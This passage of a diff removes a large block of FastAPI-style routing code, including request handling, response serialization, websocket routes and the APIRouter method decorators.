run_in_threadpool( - field.validate, response_content, {}, loc=("response",) - ) - if isinstance(errors_, list): - errors.extend(errors_) - elif errors_: - errors.append(errors_) - if errors: - raise ResponseValidationError( - errors=_normalize_errors(errors), body=response_content - ) - - if hasattr(field, "serialize"): - return field.serialize( - value, - include=include, - exclude=exclude, - by_alias=by_alias, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - - return jsonable_encoder( - value, - include=include, - exclude=exclude, - by_alias=by_alias, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - else: - return jsonable_encoder(response_content) - - -async def run_endpoint_function( - *, dependant: Dependant, values: Dict[str, Any], is_coroutine: bool -) -> Any: - # Only called by get_request_handler. Has been split into its own function to - # facilitate profiling endpoints, since inner functions are harder to profile. 
- assert dependant.call is not None, "dependant.call must be a function" - - if is_coroutine: - return await dependant.call(**values) - else: - return await run_in_threadpool(dependant.call, **values) - - -def get_request_handler( - dependant: Dependant, - body_field: Optional[ModelField] = None, - status_code: Optional[int] = None, - response_class: Union[Type[Response], DefaultPlaceholder] = Default(JSONResponse), - response_field: Optional[ModelField] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - dependency_overrides_provider: Optional[Any] = None, -) -> Callable[[Request], Coroutine[Any, Any, Response]]: - assert dependant.call is not None, "dependant.call must be a function" - is_coroutine = asyncio.iscoroutinefunction(dependant.call) - is_body_form = body_field and isinstance(body_field.field_info, params.Form) - if isinstance(response_class, DefaultPlaceholder): - actual_response_class: Type[Response] = response_class.value - else: - actual_response_class = response_class - - async def app(request: Request) -> Response: - try: - body: Any = None - if body_field: - if is_body_form: - body = await request.form() - stack = request.scope.get("fastapi_astack") - assert isinstance(stack, AsyncExitStack) - stack.push_async_callback(body.close) - else: - body_bytes = await request.body() - if body_bytes: - json_body: Any = Undefined - content_type_value = request.headers.get("content-type") - if not content_type_value: - json_body = await request.json() - else: - message = email.message.Message() - message["content-type"] = content_type_value - if message.get_content_maintype() == "application": - subtype = message.get_content_subtype() - if subtype == "json" or subtype.endswith("+json"): - json_body = await request.json() - if json_body != Undefined: - body = json_body - else: - body = body_bytes - except json.JSONDecodeError as e: - raise RequestValidationError( - [ - { - "type": "json_invalid", - "loc": ("body", e.pos), - "msg": "JSON decode error", - "input": {}, - "ctx": {"error": e.msg}, - } - ], - body=e.doc, - ) from e - except HTTPException: - raise - except Exception as e: - raise HTTPException( - status_code=400, detail="There was an error parsing the body" - ) from e - solved_result = await solve_dependencies( - request=request, - dependant=dependant, - body=body, - dependency_overrides_provider=dependency_overrides_provider, - ) - values, errors, background_tasks, sub_response, _ = solved_result - if errors: - raise RequestValidationError(_normalize_errors(errors), body=body) - else: - raw_response = await run_endpoint_function( - dependant=dependant, values=values, is_coroutine=is_coroutine - ) - - if isinstance(raw_response, Response): - if raw_response.background is None: - raw_response.background = background_tasks - return raw_response - response_args: Dict[str, Any] = {"background": background_tasks} - # If status_code was set, use it, otherwise use the default from the - # response class, in the case of redirect it's 307 - current_status_code = ( - status_code if status_code else sub_response.status_code - ) - if current_status_code is not None: - response_args["status_code"] = current_status_code - if sub_response.status_code: - response_args["status_code"] = sub_response.status_code - content = await serialize_response( - 
field=response_field, - response_content=raw_response, - include=response_model_include, - exclude=response_model_exclude, - by_alias=response_model_by_alias, - exclude_unset=response_model_exclude_unset, - exclude_defaults=response_model_exclude_defaults, - exclude_none=response_model_exclude_none, - is_coroutine=is_coroutine, - ) - response = actual_response_class(content, **response_args) - if not is_body_allowed_for_status_code(response.status_code): - response.body = b"" - response.headers.raw.extend(sub_response.headers.raw) - return response - - return app - - -def get_websocket_app( - dependant: Dependant, dependency_overrides_provider: Optional[Any] = None -) -> Callable[[WebSocket], Coroutine[Any, Any, Any]]: - async def app(websocket: WebSocket) -> None: - solved_result = await solve_dependencies( - request=websocket, - dependant=dependant, - dependency_overrides_provider=dependency_overrides_provider, - ) - values, errors, _, _2, _3 = solved_result - if errors: - raise WebSocketRequestValidationError(_normalize_errors(errors)) - assert dependant.call is not None, "dependant.call must be a function" - await dependant.call(**values) - - return app - - -class APIWebSocketRoute(routing.WebSocketRoute): - def __init__( - self, - path: str, - endpoint: Callable[..., Any], - *, - name: Optional[str] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - dependency_overrides_provider: Optional[Any] = None, - ) -> None: - self.path = path - self.endpoint = endpoint - self.name = get_name(endpoint) if name is None else name - self.dependencies = list(dependencies or []) - self.path_regex, self.path_format, self.param_convertors = compile_path(path) - self.dependant = get_dependant(path=self.path_format, call=self.endpoint) - for depends in self.dependencies[::-1]: - self.dependant.dependencies.insert( - 0, - get_parameterless_sub_dependant(depends=depends, path=self.path_format), - ) - - self.app = websocket_session( - get_websocket_app( - dependant=self.dependant, - dependency_overrides_provider=dependency_overrides_provider, - ) - ) - - def matches(self, scope: Scope) -> Tuple[Match, Scope]: - match, child_scope = super().matches(scope) - if match != Match.NONE: - child_scope["route"] = self - return match, child_scope - - -class APIRoute(routing.Route): - def __init__( - self, - path: str, - endpoint: Callable[..., Any], - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - name: Optional[str] = None, - methods: Optional[Union[Set[str], List[str]]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Union[Type[Response], DefaultPlaceholder] = Default( - JSONResponse - ), - dependency_overrides_provider: Optional[Any] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Union[ - Callable[["APIRoute"], str], 
DefaultPlaceholder - ] = Default(generate_unique_id), - ) -> None: - self.path = path - self.endpoint = endpoint - if isinstance(response_model, DefaultPlaceholder): - return_annotation = get_typed_return_annotation(endpoint) - if lenient_issubclass(return_annotation, Response): - response_model = None - else: - response_model = return_annotation - self.response_model = response_model - self.summary = summary - self.response_description = response_description - self.deprecated = deprecated - self.operation_id = operation_id - self.response_model_include = response_model_include - self.response_model_exclude = response_model_exclude - self.response_model_by_alias = response_model_by_alias - self.response_model_exclude_unset = response_model_exclude_unset - self.response_model_exclude_defaults = response_model_exclude_defaults - self.response_model_exclude_none = response_model_exclude_none - self.include_in_schema = include_in_schema - self.response_class = response_class - self.dependency_overrides_provider = dependency_overrides_provider - self.callbacks = callbacks - self.openapi_extra = openapi_extra - self.generate_unique_id_function = generate_unique_id_function - self.tags = tags or [] - self.responses = responses or {} - self.name = get_name(endpoint) if name is None else name - self.path_regex, self.path_format, self.param_convertors = compile_path(path) - if methods is None: - methods = ["GET"] - self.methods: Set[str] = {method.upper() for method in methods} - if isinstance(generate_unique_id_function, DefaultPlaceholder): - current_generate_unique_id: Callable[ - ["APIRoute"], str - ] = generate_unique_id_function.value - else: - current_generate_unique_id = generate_unique_id_function - self.unique_id = self.operation_id or current_generate_unique_id(self) - # normalize enums e.g. http.HTTPStatus - if isinstance(status_code, IntEnum): - status_code = int(status_code) - self.status_code = status_code - if self.response_model: - assert is_body_allowed_for_status_code( - status_code - ), f"Status code {status_code} must not have a response body" - response_name = "Response_" + self.unique_id - self.response_field = create_response_field( - name=response_name, - type_=self.response_model, - mode="serialization", - ) - # Create a clone of the field, so that a Pydantic submodel is not returned - # as is just because it's an instance of a subclass of a more limited class - # e.g. UserInDB (containing hashed_password) could be a subclass of User - # that doesn't have the hashed_password. But because it's a subclass, it - # would pass the validation and be returned as is. - # By being a new field, no inheritance will be passed as is. A new model - # will be always created. 
- # TODO: remove when deprecating Pydantic v1 - self.secure_cloned_response_field: Optional[ - ModelField - ] = create_cloned_field(self.response_field) - else: - self.response_field = None # type: ignore - self.secure_cloned_response_field = None - self.dependencies = list(dependencies or []) - self.description = description or inspect.cleandoc(self.endpoint.__doc__ or "") - # if a "form feed" character (page break) is found in the description text, - # truncate description text to the content preceding the first "form feed" - self.description = self.description.split("\f")[0].strip() - response_fields = {} - for additional_status_code, response in self.responses.items(): - assert isinstance(response, dict), "An additional response must be a dict" - model = response.get("model") - if model: - assert is_body_allowed_for_status_code( - additional_status_code - ), f"Status code {additional_status_code} must not have a response body" - response_name = f"Response_{additional_status_code}_{self.unique_id}" - response_field = create_response_field(name=response_name, type_=model) - response_fields[additional_status_code] = response_field - if response_fields: - self.response_fields: Dict[Union[int, str], ModelField] = response_fields - else: - self.response_fields = {} - - assert callable(endpoint), "An endpoint must be a callable" - self.dependant = get_dependant(path=self.path_format, call=self.endpoint) - for depends in self.dependencies[::-1]: - self.dependant.dependencies.insert( - 0, - get_parameterless_sub_dependant(depends=depends, path=self.path_format), - ) - self.body_field = get_body_field(dependant=self.dependant, name=self.unique_id) - self.app = request_response(self.get_route_handler()) - - def get_route_handler(self) -> Callable[[Request], Coroutine[Any, Any, Response]]: - return get_request_handler( - dependant=self.dependant, - body_field=self.body_field, - status_code=self.status_code, - response_class=self.response_class, - response_field=self.secure_cloned_response_field, - response_model_include=self.response_model_include, - response_model_exclude=self.response_model_exclude, - response_model_by_alias=self.response_model_by_alias, - response_model_exclude_unset=self.response_model_exclude_unset, - response_model_exclude_defaults=self.response_model_exclude_defaults, - response_model_exclude_none=self.response_model_exclude_none, - dependency_overrides_provider=self.dependency_overrides_provider, - ) - - def matches(self, scope: Scope) -> Tuple[Match, Scope]: - match, child_scope = super().matches(scope) - if match != Match.NONE: - child_scope["route"] = self - return match, child_scope - - -class APIRouter(routing.Router): - def __init__( - self, - *, - prefix: str = "", - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - default_response_class: Type[Response] = Default(JSONResponse), - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - callbacks: Optional[List[BaseRoute]] = None, - routes: Optional[List[routing.BaseRoute]] = None, - redirect_slashes: bool = True, - default: Optional[ASGIApp] = None, - dependency_overrides_provider: Optional[Any] = None, - route_class: Type[APIRoute] = APIRoute, - on_startup: Optional[Sequence[Callable[[], Any]]] = None, - on_shutdown: Optional[Sequence[Callable[[], Any]]] = None, - # the generic to Lifespan[AppType] is the type of the top level application - # which the router cannot know statically, so we use typing.Any - lifespan: Optional[Lifespan[Any]] = 
None, - deprecated: Optional[bool] = None, - include_in_schema: bool = True, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> None: - super().__init__( - routes=routes, - redirect_slashes=redirect_slashes, - default=default, - on_startup=on_startup, - on_shutdown=on_shutdown, - lifespan=lifespan, - ) - if prefix: - assert prefix.startswith("/"), "A path prefix must start with '/'" - assert not prefix.endswith( - "/" - ), "A path prefix must not end with '/', as the routes will start with '/'" - self.prefix = prefix - self.tags: List[Union[str, Enum]] = tags or [] - self.dependencies = list(dependencies or []) - self.deprecated = deprecated - self.include_in_schema = include_in_schema - self.responses = responses or {} - self.callbacks = callbacks or [] - self.dependency_overrides_provider = dependency_overrides_provider - self.route_class = route_class - self.default_response_class = default_response_class - self.generate_unique_id_function = generate_unique_id_function - - def route( - self, - path: str, - methods: Optional[List[str]] = None, - name: Optional[str] = None, - include_in_schema: bool = True, - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_route( - path, - func, - methods=methods, - name=name, - include_in_schema=include_in_schema, - ) - return func - - return decorator - - def add_api_route( - self, - path: str, - endpoint: Callable[..., Any], - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - methods: Optional[Union[Set[str], List[str]]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Union[Type[Response], DefaultPlaceholder] = Default( - JSONResponse - ), - name: Optional[str] = None, - route_class_override: Optional[Type[APIRoute]] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Union[ - Callable[[APIRoute], str], DefaultPlaceholder - ] = Default(generate_unique_id), - ) -> None: - route_class = route_class_override or self.route_class - responses = responses or {} - combined_responses = {**self.responses, **responses} - current_response_class = get_value_or_default( - response_class, self.default_response_class - ) - current_tags = self.tags.copy() - if tags: - current_tags.extend(tags) - current_dependencies = self.dependencies.copy() - if dependencies: - current_dependencies.extend(dependencies) - current_callbacks = self.callbacks.copy() - if callbacks: - current_callbacks.extend(callbacks) - current_generate_unique_id = get_value_or_default( - generate_unique_id_function, self.generate_unique_id_function - ) - route = route_class( - self.prefix + path, - endpoint=endpoint, - response_model=response_model, - status_code=status_code, - tags=current_tags, - 
dependencies=current_dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=combined_responses, - deprecated=deprecated or self.deprecated, - methods=methods, - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema and self.include_in_schema, - response_class=current_response_class, - name=name, - dependency_overrides_provider=self.dependency_overrides_provider, - callbacks=current_callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=current_generate_unique_id, - ) - self.routes.append(route) - - def api_route( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - methods: Optional[List[str]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_api_route( - path, - func, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=methods, - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - return func - - return decorator - - def add_api_websocket_route( - self, - path: str, - endpoint: Callable[..., Any], - name: Optional[str] = None, - *, - dependencies: Optional[Sequence[params.Depends]] = None, - ) -> None: - current_dependencies = self.dependencies.copy() - if dependencies: - current_dependencies.extend(dependencies) - - route = APIWebSocketRoute( - self.prefix + path, - endpoint=endpoint, - name=name, - dependencies=current_dependencies, - 
dependency_overrides_provider=self.dependency_overrides_provider, - ) - self.routes.append(route) - - def websocket( - self, - path: str, - name: Optional[str] = None, - *, - dependencies: Optional[Sequence[params.Depends]] = None, - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_api_websocket_route( - path, func, name=name, dependencies=dependencies - ) - return func - - return decorator - - def websocket_route( - self, path: str, name: Union[str, None] = None - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_websocket_route(path, func, name=name) - return func - - return decorator - - def include_router( - self, - router: "APIRouter", - *, - prefix: str = "", - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - default_response_class: Type[Response] = Default(JSONResponse), - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - callbacks: Optional[List[BaseRoute]] = None, - deprecated: Optional[bool] = None, - include_in_schema: bool = True, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> None: - if prefix: - assert prefix.startswith("/"), "A path prefix must start with '/'" - assert not prefix.endswith( - "/" - ), "A path prefix must not end with '/', as the routes will start with '/'" - else: - for r in router.routes: - path = getattr(r, "path") # noqa: B009 - name = getattr(r, "name", "unknown") - if path is not None and not path: - raise FastAPIError( - f"Prefix and path cannot be both empty (path operation: {name})" - ) - if responses is None: - responses = {} - for route in router.routes: - if isinstance(route, APIRoute): - combined_responses = {**responses, **route.responses} - use_response_class = get_value_or_default( - route.response_class, - router.default_response_class, - default_response_class, - self.default_response_class, - ) - current_tags = [] - if tags: - current_tags.extend(tags) - if route.tags: - current_tags.extend(route.tags) - current_dependencies: List[params.Depends] = [] - if dependencies: - current_dependencies.extend(dependencies) - if route.dependencies: - current_dependencies.extend(route.dependencies) - current_callbacks = [] - if callbacks: - current_callbacks.extend(callbacks) - if route.callbacks: - current_callbacks.extend(route.callbacks) - current_generate_unique_id = get_value_or_default( - route.generate_unique_id_function, - router.generate_unique_id_function, - generate_unique_id_function, - self.generate_unique_id_function, - ) - self.add_api_route( - prefix + route.path, - route.endpoint, - response_model=route.response_model, - status_code=route.status_code, - tags=current_tags, - dependencies=current_dependencies, - summary=route.summary, - description=route.description, - response_description=route.response_description, - responses=combined_responses, - deprecated=route.deprecated or deprecated or self.deprecated, - methods=route.methods, - operation_id=route.operation_id, - response_model_include=route.response_model_include, - response_model_exclude=route.response_model_exclude, - response_model_by_alias=route.response_model_by_alias, - response_model_exclude_unset=route.response_model_exclude_unset, - response_model_exclude_defaults=route.response_model_exclude_defaults, - response_model_exclude_none=route.response_model_exclude_none, - 
include_in_schema=route.include_in_schema - and self.include_in_schema - and include_in_schema, - response_class=use_response_class, - name=route.name, - route_class_override=type(route), - callbacks=current_callbacks, - openapi_extra=route.openapi_extra, - generate_unique_id_function=current_generate_unique_id, - ) - elif isinstance(route, routing.Route): - methods = list(route.methods or []) - self.add_route( - prefix + route.path, - route.endpoint, - methods=methods, - include_in_schema=route.include_in_schema, - name=route.name, - ) - elif isinstance(route, APIWebSocketRoute): - current_dependencies = [] - if dependencies: - current_dependencies.extend(dependencies) - if route.dependencies: - current_dependencies.extend(route.dependencies) - self.add_api_websocket_route( - prefix + route.path, - route.endpoint, - dependencies=current_dependencies, - name=route.name, - ) - elif isinstance(route, routing.WebSocketRoute): - self.add_websocket_route( - prefix + route.path, route.endpoint, name=route.name - ) - for handler in router.on_startup: - self.add_event_handler("startup", handler) - for handler in router.on_shutdown: - self.add_event_handler("shutdown", handler) - - def get( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["GET"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def put( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: 
Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["PUT"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def post( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["POST"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - 
callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def delete( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["DELETE"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def options( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - 
methods=["OPTIONS"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def head( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - return self.api_route( - path=path, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=["HEAD"], - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - - def patch( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: 
